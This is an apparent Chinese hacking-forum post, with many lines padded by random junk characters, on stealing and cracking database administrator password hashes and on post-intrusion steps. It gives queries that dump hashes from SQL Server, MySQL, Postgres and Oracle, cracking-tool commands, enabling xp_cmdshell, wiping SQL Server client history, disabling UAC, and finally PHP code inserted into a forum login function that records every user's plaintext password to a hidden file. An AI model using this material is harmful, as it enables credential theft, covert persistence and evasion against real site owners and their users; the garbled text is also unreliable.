1 s: n, |. h$ M) Y) k( K3 J各种类型数据库抓HASH破解最高权限密码!6 y: z8 |# _. |3 B3 r! \6 k
1.sql server2000
/ C8 A- }+ j F1 Y2 `+ fSELECT password from master.dbo.sysxlogins where name='sa'0 V3 G9 `2 S; m% a0 I. _9 w4 `
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503417 B# U, }2 B# u, D/ n# V
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
# b# K; O# V7 u* T, i, q0 a: ~" }! j5 y' D. K; t
0×0100- constant header
# B& E9 F; r7 G! z% t34767D5C- salt
% p3 m. K6 K/ a: o) F0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
9 u# a3 c+ N$ @2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash3 K1 H9 b Z) f- n5 j7 J+ N& L5 }
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
' B2 C3 r% n8 l+ \, ISQL server 2005:-
) ?3 M$ l0 _' s8 a4 ?SELECT password_hash FROM sys.sql_logins where name='sa'
0 X ?# F3 w! y9 G' o/ S: E0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
3 x5 w1 {. h3 ^2 q, L0×0100- constant header# w: f* [# x* T: _# d) q! h
993BF231-salt
2 A9 M" H1 m9 k4 T7 A. K5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash- y( b3 R/ J3 [; w5 k
crack case sensitive hash in cain, try brute force and dictionary based attacks.
7 [" V% e v1 j* v7 t ?" ?
* s1 Q& p7 C1 w' W1 V7 R8 {' supdate:- following bernardo’s comments:-1 H! G! s: A6 |& J: d
use function fn_varbintohexstr() to cast password in a hex string.8 B$ j. Q5 d6 |
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
- j: @& G- F8 a% v- L# B
- G& c$ B( `7 L' IMYSQL:-1 S9 f, o1 M: _) F/ s
5 G/ [* p P: p
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
: [' E: N4 ]7 K3 f* A# ?; a6 b$ S% `9 e: I5 T8 J& y- Y
*mysql < 4.1
9 ?! }9 h! o0 s0 [+ I( j' B9 [( X% l
mysql> SELECT PASSWORD(‘mypass’);
0 K" f& \6 ^2 T" t, C+——————–+
; a F6 u+ R9 L" P6 ?4 F0 ]7 I| PASSWORD(‘mypass’) |2 B7 g" ^) s+ p/ ^
+——————–+
( ] j* k' _1 q9 f+ N| 6f8c114b58f2ce9e |
1 s9 e* Q% Q) p) I( [, C) a+——————–+) p$ {! R% x& X8 u1 G
% v: _# a; J# c; d! R4 N1 G
*mysql >=4.1% r$ V1 q: G: D! {
6 d. U# L: v9 u. c3 M
mysql> SELECT PASSWORD(‘mypass’);, {( | w! ^ \ E( H
+——————————————-+* c9 v* P4 a5 v4 x' _8 j
| PASSWORD(‘mypass’) |/ M9 Z1 k+ G1 E7 x( f4 i( T# W0 `
+——————————————-+7 ^/ U9 |$ ]3 s& |3 J: V5 ]
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |5 G$ V. b8 @! w: M1 o# Y& _; Z' R
+——————————————-+
' B8 U7 O. ], v' j) {4 R/ i3 E/ r- H2 z: h( S J4 ]3 a% @& G
Select user, password from mysql.user
[; `7 f7 f( p" Y& C3 x7 |The hashes can be cracked in ‘cain and abel’' @# f# D3 r, M5 C) D6 e
^9 H) ^$ s/ j0 s' }: q6 d- SPostgres:-
6 w! w" e) \) C; b* nPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)2 x3 _0 s. ]6 l( u2 ?" o( Y' }
select usename, passwd from pg_shadow;. b/ y4 w8 w$ P5 J' [
usename | passwd4 U. l, Y1 R3 i1 I5 L* R1 N
——————+————————————-
7 E6 \" C( K/ g+ o6 U h& f/ Q% Jtestuser | md5fabb6d7172aadfda4753bf0507ed4396
. g4 `8 M) T9 b t* fuse mdcrack to crack these hashes:-* L: X( \5 N* x, K1 e A; [# `
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
9 Q8 f" w" H8 u" W" z- i% q( G5 V B9 v+ A6 K( O7 c
Oracle:-$ B3 |% \1 R! J: C/ v
select name, password, spare4 from sys.user$ \+ H6 q ^0 X- ^1 W
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
) e9 S" ]7 I0 U$ w, Z3 [" G1 ^More on Oracle later, i am a bit bored….
0 T3 _4 q- F1 g- t- V# P, V% h8 h% j) i# x* K+ x
( j7 b3 S4 n! {; N" s- M0 Z) Z
在sql server2005/2008中开启xp_cmdshell
/ N) e% h3 l4 l* E& m/ L. J-- To allow advanced options to be changed. A" _# q4 y7 r- Y+ l
EXEC sp_configure 'show advanced options', 1 ~' X; X4 x+ {) M) P( \
GO5 x Q$ n% R* X8 U7 c
-- To update the currently configured value for advanced options., W/ H/ X2 m; l' }: _# u
RECONFIGURE1 _+ [9 m2 k5 s. E( _
GO
5 G$ p3 r0 V) ?' P3 a-- To enable the feature.$ M8 g0 a9 q; M8 H) Q+ _
EXEC sp_configure 'xp_cmdshell', 1
' Y% g( t p2 q; Q5 O9 ?) m( iGO
8 g1 U' V) o5 b# e-- To update the currently configured value for this feature.: R3 u3 K( P$ j6 O% E. D% t
RECONFIGURE1 V3 c5 l: b1 z. }% F) ?
GO
% i0 k& C5 h" Z; cSQL 2008 server日志清除,在清楚前一定要备份。4 ^6 u7 v: G+ X; w% R
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
8 P9 B8 n. O9 FX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin& E4 ^& j) b; q) S m. K: x# i9 G
# z1 s' Q7 J* ?4 V! G- K9 b0 z
对于SQL Server 2008以前的版本:
9 C! e8 P6 R4 t( q9 M. DSQL Server 2005: a9 N2 b" _. k c9 X( S& H/ S
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
1 Q( n9 e1 C C' lSQL Server 2000:
! @7 {0 x3 b# q9 t# t清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。2 q1 C. r: y- T% V/ `* {+ D& ~2 w
# \ t- m6 @9 |) ] `, N本帖最后由 simeon 于 2013-1-3 09:51 编辑5 h+ a* {: t. R' K7 c
! Q& E& o6 u' w/ K7 L
u" d! u W3 h1 c, \
windows 2008 文件权限修改" _% d! M, a5 _% M% k5 u, q6 U/ m
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
" \' P2 }6 f% ~+ G+ w1 r: J2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
, P/ b7 [3 X) |* O一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
9 f$ g. X3 ^: Z! p3 `# i
( B4 f6 a# ]6 x7 [) p& dWindows Registry Editor Version 5.002 ^" V1 C0 h Q w" _: ^
[HKEY_CLASSES_ROOT\*\shell\runas]
2 l0 a/ O: M2 i! b@="管理员取得所有权"7 P$ G2 y h2 j0 R1 y4 k
"NoWorkingDirectory"="". j9 T1 m3 e8 y* [ A7 Y1 ~# _
[HKEY_CLASSES_ROOT\*\shell\runas\command]
$ W2 n5 o8 d' S@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"4 J% k/ n. u$ ?2 j3 ^3 B
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"5 u9 \( D, z# b4 j) G! w4 |' T
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
, t2 |' O% u, }) m7 |7 y@="管理员取得所有权"# k5 b- y. x# n+ b7 V$ e
"NoWorkingDirectory"=""
2 C' a5 j6 L f2 F) Q$ i: B[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
% q) a: A0 w F" `@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"" F/ o5 G( K* M- t5 V
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
- x9 ]- {: H( y* {" x1 ~* K8 C/ j; Y/ h1 C3 M+ B* B
[HKEY_CLASSES_ROOT\Directory\shell\runas]. \2 b. k( `: f$ a3 Q9 i, o9 k
@="管理员取得所有权"
; a; n# Y2 e7 j( d7 n8 M"NoWorkingDirectory"=""- F: f, V( a0 b& v5 b+ d
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]* m O! D; b7 J: X
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"* I% F$ r: A1 e3 p, o
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t" t% e t3 m; b4 _& v: M; w% m* l9 h
# E' v7 l' @+ j/ @7 E; v8 s& X* h' V6 W j3 O5 W6 I
win7右键“管理员取得所有权”.reg导入6 v7 R/ x. N% S
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,/ ~* c" k+ G2 i# {
1、C:\Windows这个路径的“notepad.exe”不需要替换
: O* N7 Z9 {+ |$ N6 q" Y2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
1 a+ |& ~; Z% q! ]: X4 Z3、四个“notepad.exe.mui”不要管
- l- Z* \3 c# d- q- K4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和5 a- Q }1 |) L1 A) O w- c; A) k
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”3 v5 ?8 M/ W7 \8 K3 I+ a
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
J/ A; V+ T2 Y% T1 k g$ J2 S替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
, M1 Z+ M% A8 k+ \* Swindows 2008中关闭安全策略:
; ?3 Y. ~6 T7 K& n$ qreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
6 G7 `( g+ k0 I0 Z7 ~8 J修改uc_client目录下的client.php 在
! q3 _- w, z$ }4 C% ?2 v1 pfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {& ~" Q) Q6 i# D& O
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
. l4 m/ b( _, F7 |. S你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw* W3 c9 ]4 [# k! k8 z2 W$ G! f
if(getenv('HTTP_CLIENT_IP')) {
5 V$ O/ l. l1 f3 j9 Q$ [$onlineip = getenv('HTTP_CLIENT_IP');
/ ]" ?9 }0 ^. D8 K6 ^- o} elseif(getenv('HTTP_X_FORWARDED_FOR')) {5 U) H6 g+ U( Z% a* W
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
, s* T3 ?8 |: f& ]5 e- v0 a} elseif(getenv('REMOTE_ADDR')) {/ {, Z6 S2 c( V# d; H- x
$onlineip = getenv('REMOTE_ADDR');
9 X4 g( o! y6 V4 d- l} else {
/ S1 Z' \' K3 @7 \7 X" B' |$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];* c% F5 E- G! M$ y+ V
}1 y' A/ `2 U; U
$showtime=date("Y-m-d H:i:s");
& N/ I& G+ U1 [2 I0 c5 h4 g2 L $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
. n- `7 N, x- _5 Q+ a/ m( j1 \ $handle=fopen('./data/cache/csslog.php','a+');9 Q9 v' H. {# D! W; I; V! o+ {
$write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对